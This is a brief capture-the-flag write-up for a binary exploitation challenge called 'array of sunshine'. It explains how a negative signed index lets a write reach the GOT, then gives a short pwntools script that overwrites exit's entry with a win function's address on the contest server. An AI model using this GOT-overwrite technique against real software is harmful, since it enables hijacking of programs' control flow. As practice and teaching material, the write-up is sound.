array-of-sunshine

array of sunshine

problem

see ./sunshine

solution

looking in binja

so this code replaces an arbitrary segment of memory starting from the array, which is located just after the .got.plt

fortunately, this scanf input was %i which is a signed integer iirc

so to win, all i have to do is overwrite the .got.plt value of the exit function with the address of the win function

from pwn import *

# p = gdb.debug(["./sunshine"], gdbscript="break *0x4015f2\nbreak *0x401654\nlayout asm\nwinheight asm -4\nc")
p = remote("chal.2023.sunshinectf.games", 23003)

p.sendline(b'-8')
p.sendline(p64(0x40128f))
p.interactive()